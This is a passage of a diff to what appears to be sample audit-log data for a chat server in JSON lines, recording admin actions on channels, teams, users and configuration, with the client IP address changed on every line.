AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:01:48.946 Z","event":"patchChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"patch":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:01:52.914 Z","event":"deleteChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe","channeld":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:02:01.482 Z","event":"deleteChannel","status":"fail","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe","channeld":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"code":400,"err":"api.channel.delete_channel.deleted.app_error","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:02:09.835 Z","event":"convertChannelToPrivate","status":"fail","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"code":400,"err":"app.channel.update.bad_id","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:02:25.202 Z","event":"restoreChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:02:31.485 Z","event":"convertChannelToPrivate","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:02:56.786 Z","event":"removeChannelMember","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"P"},"remove_user_id":"ag99yu4i1if63jrui63tsmq57y","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:03:01.043 Z","event":"getConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:03:13.849 Z","event":"createChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels","channel":{"id":"j3g9ysx6q3nh3q5kiyh3wrugha","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:04:01.294 Z","event":"deleteChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha","channeld":{"id":"j3g9ysx6q3nh3q5kiyh3wrugha","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:12:11.211 Z","event":"getConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:12:23.085 Z","event":"patchTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch","patched":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:12:29.655 Z","event":"patchTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch","patched":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:12:46.044 Z","event":"createTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/teams","team":{"id":"dqpybz1o3pbuzf7876u834nura","name":"another-team","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:18:13.183 Z","event":"removeTeamMember","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y","team":{"id":"dqpybz1o3pbuzf7876u834nura","name":"another-team","type":"O"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 00:18:17.907 Z","event":"revokeAllSessionsForUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"55.33.6.7","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 01:02:56.163 Z","event":"patchUser","status":"success","user_id":"cuk45yubk3nq8g7udrhojbk8ty","session_id":"6s4sy7p1b3fqdc3fktsh4yznhr","ip_address":"55.33.6.7","api_path":"/api/v4/users/me/patch","patch":{"id":"cuk45yubk3nq8g7udrhojbk8ty","name":"other1","roles":"system_user system_admin"},"user":{"id":"cuk45yubk3nq8g7udrhojbk8ty","name":"other","roles":"system_user system_admin"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 01:13:26.358 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"55.33.6.7","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":1,"errors":"[]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 01:13:08.904 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"55.33.6.7","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":1,"errors":"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} -{"timestamp":"2021-12-05 01:20:06.246 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"55.33.6.7","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":2,"errors":"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., z63ehbxy47fwpc8bmz9ouuh7fe:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty z63ehbxy47fwpc8bmz9ouuh7fe]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:19:32.051 Z","event":"updateConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"89.160.20.156","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:19:48.599 Z","event":"updateConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"89.160.20.156","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:19:51.324 Z","event":"Logout","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"pjh4n69j3p883k7hhzippskcba","ip_address":"89.160.20.156","api_path":"/api/v4/users/logout","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:19:58.729 Z","event":"login","status":"success","user_id":"","session_id":"","ip_address":"89.160.20.156","api_path":"/api/v4/users/login","device_id":"","login_id":"admin","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:20:33.027 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:20:37.771 Z","event":"patchUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/users/me/patch","patch":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:20:53.063 Z","event":"updatePassword","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:28:18.032 Z","event":"updatePreferences","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-04 23:28:19.342 Z","event":"createPost","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/posts","post":{"id":"gbuu48qc17bbjq4xdg5ciq4iao","channel_id":"hkmb8e53ijdkbc8agbpuxe8qxc","type":"","pinned":false},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:01:23.974 Z","event":"createChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:01:48.946 Z","event":"patchChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"patch":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:01:52.914 Z","event":"deleteChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe","channeld":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:02:01.482 Z","event":"deleteChannel","status":"fail","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe","channeld":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"code":400,"err":"api.channel.delete_channel.deleted.app_error","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:02:09.835 Z","event":"convertChannelToPrivate","status":"fail","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"code":400,"err":"app.channel.update.bad_id","user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:02:25.202 Z","event":"restoreChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:02:31.485 Z","event":"convertChannelToPrivate","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"O"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:02:56.786 Z","event":"removeChannelMember","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/members/ag99yu4i1if63jrui63tsmq57y","channel":{"id":"cje83zmowjds9ywg6m4jf8w7oe","name":"public-channel","type":"P"},"remove_user_id":"ag99yu4i1if63jrui63tsmq57y","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:03:01.043 Z","event":"getConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:03:13.849 Z","event":"createChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels","channel":{"id":"j3g9ysx6q3nh3q5kiyh3wrugha","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:04:01.294 Z","event":"deleteChannel","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/channels/j3g9ysx6q3nh3q5kiyh3wrugha","channeld":{"id":"j3g9ysx6q3nh3q5kiyh3wrugha","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:12:11.211 Z","event":"getConfig","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/config","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:12:23.085 Z","event":"patchTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch","patched":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:12:29.655 Z","event":"patchTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/patch","patched":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:12:46.044 Z","event":"createTeam","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/teams","team":{"id":"dqpybz1o3pbuzf7876u834nura","name":"another-team","type":"O"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:18:13.183 Z","event":"removeTeamMember","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y","team":{"id":"dqpybz1o3pbuzf7876u834nura","name":"another-team","type":"O"},"user":{"id":"ag99yu4i1if63jrui63tsmq57y","name":"admin","roles":"system_admin system_user"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 00:18:17.907 Z","event":"revokeAllSessionsForUser","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"mbz8h4gkxp8g3yzanizcpg43dc","ip_address":"89.160.20.156","api_path":"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 01:02:56.163 Z","event":"patchUser","status":"success","user_id":"cuk45yubk3nq8g7udrhojbk8ty","session_id":"6s4sy7p1b3fqdc3fktsh4yznhr","ip_address":"89.160.20.156","api_path":"/api/v4/users/me/patch","patch":{"id":"cuk45yubk3nq8g7udrhojbk8ty","name":"other1","roles":"system_user system_admin"},"user":{"id":"cuk45yubk3nq8g7udrhojbk8ty","name":"other","roles":"system_user system_admin"},"cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} +{"timestamp":"2021-12-05 01:13:26.358 Z","event":"addTeamMembers","status":"success","user_id":"ag99yu4i1if63jrui63tsmq57y","session_id":"f57d8pkf7iyg8xo6ttq73ggcnr","ip_address":"89.160.20.156","api_path":"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch","count":1,"errors":"[]","team":{"id":"knrndtys13rzzk48ugm7mssnke","name":"test","type":"O"},"user_ids":"[cuk45yubk3nq8g7udrhojbk8ty]","cluster_id":"jq3utry71f8a7q9qgebmjccf4r","client":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"} 